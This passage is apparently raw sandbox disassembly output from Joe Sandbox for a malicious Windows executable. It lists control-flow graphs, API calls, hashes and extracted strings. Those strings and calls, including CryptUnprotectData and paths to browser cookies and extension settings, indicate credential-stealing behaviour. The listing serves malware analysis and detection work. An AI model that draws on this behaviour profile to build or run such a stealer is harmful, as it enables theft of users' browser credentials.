                                                  control_flow_graph 218 2c2c09-2c2c10 219 2c2cd5-2c2cdc 218->219 220 2c2c16-2c2c6b call 2c91d0 218->220 222 2c2d76-2c2d7d 219->222 223 2c2ce2-2c2d06 219->223 239 2c2c6d-2c2c74 220->239 240 2c2cc4-2c2cc9 220->240 224 2c2d7f-2c2d83 222->224 225 2c2d93-2c2d9a 222->225 227 2c2d08-2c2d0f 223->227 228 2c2d29-2c2d4c call 2c2060 223->228 229 2c2d85-2c2d8a 224->229 230 2c2d91 224->230 231 2c2d9c-2c2d9f 225->231 232 2c2da6-2c2da9 225->232 233 2c2d1b-2c2d27 call 2c1ee0 227->233 234 2c2d11-2c2d14 227->234 242 2c2d4e-2c2d6d 228->242 243 2c2d74 228->243 229->230 230->232 231->232 233->243 234->233 244 2c2c88-2c2c92 239->244 245 2c2c76-2c2c7d 239->245 246 2c2cd0 240->246 242->243 243->232 248 2c2c9c 244->248 249 2c2c94-2c2c96 ExitProcess 244->249 245->244 247 2c2c7f-2c2c86 245->247 246->232 247->244 250 2c2c9e-2c2ca5 247->250 248->240 251 2c2ca7-2c2cae 250->251 252 2c2cb0-2c2cba 250->252 251->240 251->252 252->240 253 2c2cbc-2c2cbe ExitProcess 252->253
                                                  APIs
                                                    • Part of subcall function 002C91D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002C91FE
                                                  • ExitProcess.KERNEL32 ref: 002C2C96
                                                  • ExitProcess.KERNEL32 ref: 002C2CBE
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 2431947247-0
                                                  • Opcode ID: efdd7d58ceddfecb33694ffa19bca7c476883413c49b7b20bbc83647426947ef
                                                  • Instruction ID: 4b6149f2f49e064ad14695cb8f21b6ec8fab0b640d4c49cd16829ab6e9f3e016
                                                  • Opcode Fuzzy Hash: efdd7d58ceddfecb33694ffa19bca7c476883413c49b7b20bbc83647426947ef
                                                  • Instruction Fuzzy Hash: 40514774910209EFDB18CF84C598FADB7B1BF54304F208299E5066B291CBB59F99DF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 254 2c8c70-2c8c96 KiUserCallbackDispatcher GetSystemMetrics
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 002C8C75
                                                  • GetSystemMetrics.USER32(00000001), ref: 002C8C86
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherMetricsSystemUser
                                                  • String ID:
                                                  • API String ID: 365337688-0
                                                  • Opcode ID: 77c0ac851482324f44ee2d7418482572d94634f3d18931cd1100d53b80422982
                                                  • Instruction ID: a7fca18ec52aa364c9eef8aac81cbc6bb622f2f3cd1de29d647a08562b8b1040
                                                  • Opcode Fuzzy Hash: 77c0ac851482324f44ee2d7418482572d94634f3d18931cd1100d53b80422982
                                                  • Instruction Fuzzy Hash: 69D0C93414430CEFD700DF90E80DB94BBA8FB48795F10C176ED4D4A381DAB255418BE6

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 255 2c1110-2c1127 256 2c112d-2c1187 call 2c2170 call 2c2250 call 2c90f0 255->256 257 2c12e5-2c12e8 255->257 264 2c1189-2c11ab call 2c36d0 256->264 265 2c11b0-2c11b4 256->265 269 2c12d9-2c12e2 call 2c1ee0 264->269 267 2c11bf-2c11c9 265->267 268 2c11cf-2c11e1 267->268 267->269 271 2c11e5-2c11fa 268->271 272 2c11e3 268->272 269->257 275 2c11fc-2c1200 271->275 276 2c1238-2c123c 271->276 272->267 275->276 278 2c1202-2c1209 call 2c90b0 275->278 279 2c123e-2c1252 276->279 280 2c1254-2c1268 276->280 286 2c120e-2c1218 278->286 279->280 282 2c1280-2c12ba call 2c36d0 279->282 283 2c126a-2c127e 280->283 284 2c12d4 280->284 289 2c12bc-2c12c6 282->289 290 2c12d2 282->290 283->282 283->284 284->269 286->276 288 2c121a-2c1235 call 2c2250 call 2c90f0 286->288 288->276 289->290 292 2c12c8-2c12cc DeleteFileW 289->292 290->269 292->290
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 1336376b9593dce3b043d9c3d14d318938f3a34154b2cfb19cbdf7b27b41bcbf
                                                  • Instruction ID: bc90519e0ccde8973141a3d87c286ee01625f87f21f27b5450c386ac3bd19cf1
                                                  • Opcode Fuzzy Hash: 1336376b9593dce3b043d9c3d14d318938f3a34154b2cfb19cbdf7b27b41bcbf
                                                  • Instruction Fuzzy Hash: EF51D6B8914158ABCB00DF94C491FEEBBB6AF45304F08829CE8499B343C635EAB1CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 296 2c1060-2c1083 297 2c10a4-2c10c3 call 2c8d40 296->297 298 2c1085-2c109e SHGetFolderPathW 296->298 300 2c10c8-2c10cf 297->300 298->297 301 2c10fd-2c1100 300->301 302 2c10d1-2c10f6 call 2c1ec0 call 2c2b10 300->302 302->301
                                                  APIs
                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,-00000209), ref: 002C109E
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: FolderPath
                                                  • String ID:
                                                  • API String ID: 1514166925-0
                                                  • Opcode ID: 2389390c936fdc79d39432d239a79afb57b1e9c8370977df017eaeff8c7f7313
                                                  • Instruction ID: a106bde59352282b4e6f2426196761503d4f5a6e701c4865e0c0935bf8ef94a1
                                                  • Opcode Fuzzy Hash: 2389390c936fdc79d39432d239a79afb57b1e9c8370977df017eaeff8c7f7313
                                                  • Instruction Fuzzy Hash: 5D1133B5900208BBDB04DF54CC56FAE7775EB44314F14C258F9285B282D6769A51CB90
                                                  APIs
                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 002C8BA0
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CurrentProfile
                                                  • String ID:
                                                  • API String ID: 2104809126-0
                                                  • Opcode ID: c7e5ef45efb01400edbc74e3d504baf42dff680aa453f35ef4846c551958722c
                                                  • Instruction ID: 0e973a24429624dbf02d33800746aef0bde272e6662271d764f74bd2760eafa9
                                                  • Opcode Fuzzy Hash: c7e5ef45efb01400edbc74e3d504baf42dff680aa453f35ef4846c551958722c
                                                  • Instruction Fuzzy Hash: 04F0D1B4910209A7CB04CF58DC91FBE3B79EB40308F20C26DF94596246EB31DA209B50
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bdde5e980cf62d680879fd100c733764784921fdebbbf4c41d732b77db0dd4f
                                                  • Instruction ID: e6a3937721a89bd1b189d22a5d0bd74072ba5d2bdadf600f6e939690498ab0f8
                                                  • Opcode Fuzzy Hash: 6bdde5e980cf62d680879fd100c733764784921fdebbbf4c41d732b77db0dd4f
                                                  • Instruction Fuzzy Hash: E9E0D8B1520108FFDF009F50E849F6B3798AB64311F00C519BD0D8B141CB71D964CB50
                                                  APIs
                                                  • ExitProcess.KERNEL32 ref: 002C1CD0
                                                    • Part of subcall function 002C1E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,002C1CB1,?,002C1D86,?), ref: 002C1E59
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CreateExitHeapProcess
                                                  • String ID:
                                                  • API String ID: 611137554-0
                                                  • Opcode ID: 423d39e9eb2765397140d4078b6dc96445ff1359419e5ef150d03e5cc231e23c
                                                  • Instruction ID: e8ba1d19e78fe3b6c89983b07bd29dd6c5dac7f206e6009f23a65e547fc34eab
                                                  • Opcode Fuzzy Hash: 423d39e9eb2765397140d4078b6dc96445ff1359419e5ef150d03e5cc231e23c
                                                  • Instruction Fuzzy Hash: 6ED0626176070655DA607FB15D17F56368C5E027C4F144729BE09C5163FE15DA308573
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(030F0000,00000000,00000000,02E80000), ref: 002C1EFE
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 2adcc7e9230ea5703907b56f67ef1072d4f0c656ef229a23e39e4e8f8e00239d
                                                  • Instruction ID: 28acd4fdc32e95b3c92a069a6aa4046bd018c4a6146eb41c3ec2c48865af8665
                                                  • Opcode Fuzzy Hash: 2adcc7e9230ea5703907b56f67ef1072d4f0c656ef229a23e39e4e8f8e00239d
                                                  • Instruction Fuzzy Hash: 92E0E27051420CEBDB14CF98E94AFAA7BA8EB09305F104288F90887280E771AE50CB91
                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,002C1CB1,?,002C1D86,?), ref: 002C1E59
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CreateHeap
                                                  • String ID:
                                                  • API String ID: 10892065-0
                                                  • Opcode ID: 06c064ef6a8c2d9405a905ff8f8c5bcd06816ff7da271e3d41ab1ebd7331716a
                                                  • Instruction ID: f05387c0eb16bf398fc748865a191d6318c5580b118dd291babbeab4f2c6be25
                                                  • Opcode Fuzzy Hash: 06c064ef6a8c2d9405a905ff8f8c5bcd06816ff7da271e3d41ab1ebd7331716a
                                                  • Instruction Fuzzy Hash: 79D01230674308EFF7215B60BC4FF113698A709755F100525FE0DC91E1E3F164A08654
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 34a070a1799fe88a8e60e1b261a06f0a08d43f632c399cacef5a3b0db13b1374
                                                  • Instruction ID: fc4492932638d6decf0488d3e2d465a09121612378df41621544014cd9999770
                                                  • Opcode Fuzzy Hash: 34a070a1799fe88a8e60e1b261a06f0a08d43f632c399cacef5a3b0db13b1374
                                                  • Instruction Fuzzy Hash: 05C04C75160208AFDA059B94FD5AE6A3B9CA749600F444408B60D4B150DB61A8008750
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 002C2E41
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: b5959607eabf3454ec8c6635af041bcd0cbdde4240da82071a455c0e17c920ef
                                                  • Instruction ID: d8bcedaeb3c63ecd477c165c7973f332bfbc56202154c19cb8fa51e2dc5af633
                                                  • Opcode Fuzzy Hash: b5959607eabf3454ec8c6635af041bcd0cbdde4240da82071a455c0e17c920ef
                                                  • Instruction Fuzzy Hash: A7116A78920208E7CB04CF44D550EB9B7B5FF58301F208298F80A9B381EB75DEA5E7A0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 002C2AF6
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 7800f9e1548c3b1a24b78485eda907358a2cbf348c9ba5a8bd60a595d675cfc6
                                                  • Instruction ID: 827bf82a2691503c819689a946972a4459b6caff791ad1bd6e883b28e8172e4d
                                                  • Opcode Fuzzy Hash: 7800f9e1548c3b1a24b78485eda907358a2cbf348c9ba5a8bd60a595d675cfc6
                                                  • Instruction Fuzzy Hash: 5911A024C20219E6CB24DF94D441BBC77B2FF14700F6042ADE9062A6C1EBB99FA4E391
                                                  APIs
                                                  • NtQueryObject.NTDLL(002C1593,00000001,?,00000000,00000000), ref: 002C166E
                                                  • NtQueryObject.NTDLL(002C1593,00000001,?,00000000,00000000), ref: 002C1689
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: ObjectQuery
                                                  • String ID: \Local Extensions Settings\$\Network\Cookies
                                                  • API String ID: 2748340528-1141476384
                                                  • Opcode ID: c77f9949563b331437a3610bc11cab5562f397d593cdd5b1c770f7cdb400e266
                                                  • Instruction ID: f55eb6687b36fc91652144b58fbf26f473687ec9292e25fdfe5dfc14f8457f4a
                                                  • Opcode Fuzzy Hash: c77f9949563b331437a3610bc11cab5562f397d593cdd5b1c770f7cdb400e266
                                                  • Instruction Fuzzy Hash: BD219675A10208FBD700DF91DC46FD9737DAB48705F10419DB908D7181EAB1EAE8CB91
                                                  APIs
                                                  • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,002C16EB,?,002C1CA8,?,002C1D86,?), ref: 002C1C53
                                                  • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,002C16EB,?,002C1CA8,?,002C1D86,?), ref: 002C1C63
                                                  • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,002C16EB,?,002C1CA8,?,002C1D86,?), ref: 002C1C6C
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
                                                  • String ID:
                                                  • API String ID: 3068283267-0
                                                  • Opcode ID: 4fbcaf73df99b77ed2d55c3e4ed2ba6eeb7f8979f322e23567a62d9bec274a83
                                                  • Instruction ID: 1a7a17d0b2b84b3f16e5c766fdc163bf22daab799ce9426acdf067477963e2ea
                                                  • Opcode Fuzzy Hash: 4fbcaf73df99b77ed2d55c3e4ed2ba6eeb7f8979f322e23567a62d9bec274a83
                                                  • Instruction Fuzzy Hash: 9BC04C312D830966E6502BF47E0FF1536586B05B4BF444159F70ED90D19ED1542045A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?2,$?2,
                                                  • API String ID: 0-1359727664
                                                  • Opcode ID: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
                                                  • Instruction ID: cf70eefa50657a124a0cb56833eb8adaf6345d1f7ab9b423ae3f6f7e8e2532c0
                                                  • Opcode Fuzzy Hash: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
                                                  • Instruction Fuzzy Hash: 7E314DB0D10209EFCB14CF98D942BAEBBB4EF05304F20C16EEA49E7341D774AA509B95
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 002C1033
                                                    • Part of subcall function 002C32A0: LocalFree.KERNEL32(?), ref: 002C33BA
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CryptDataFreeLocalUnprotect
                                                  • String ID:
                                                  • API String ID: 1561624719-0
                                                  • Opcode ID: ba76e1c7465de8d8b88b6032dd1844520a5e18e72543b5d238c478fce23f610c
                                                  • Instruction ID: acacc8c5f5ad1c2a8e9c689c49b373020988bda34372b9256108556194de1923
                                                  • Opcode Fuzzy Hash: ba76e1c7465de8d8b88b6032dd1844520a5e18e72543b5d238c478fce23f610c
                                                  • Instruction Fuzzy Hash: 14F0F876900108ABDB05DFA8D885EEE77BCEB44310F08856AED198B242EA31DA54CB91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                  • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_
                                                  • String ID: O,$O,
                                                  • API String ID: 1955959516-439060946
                                                  • Opcode ID: e592f80eb1f9b1b0632711381b7c9192815816f0197bdafb6a5fda9c8fc484cf
                                                  • Instruction ID: a18ea5acf25768f8ee92c8e45672cbc1c9efa74a27d55c972744261f4af8f6a8
                                                  • Opcode Fuzzy Hash: e592f80eb1f9b1b0632711381b7c9192815816f0197bdafb6a5fda9c8fc484cf
                                                  • Instruction Fuzzy Hash: 76C1057492421ADBCB04DF98C591ABEB7B2FF58300F20826DE905A7304E775AE61DF91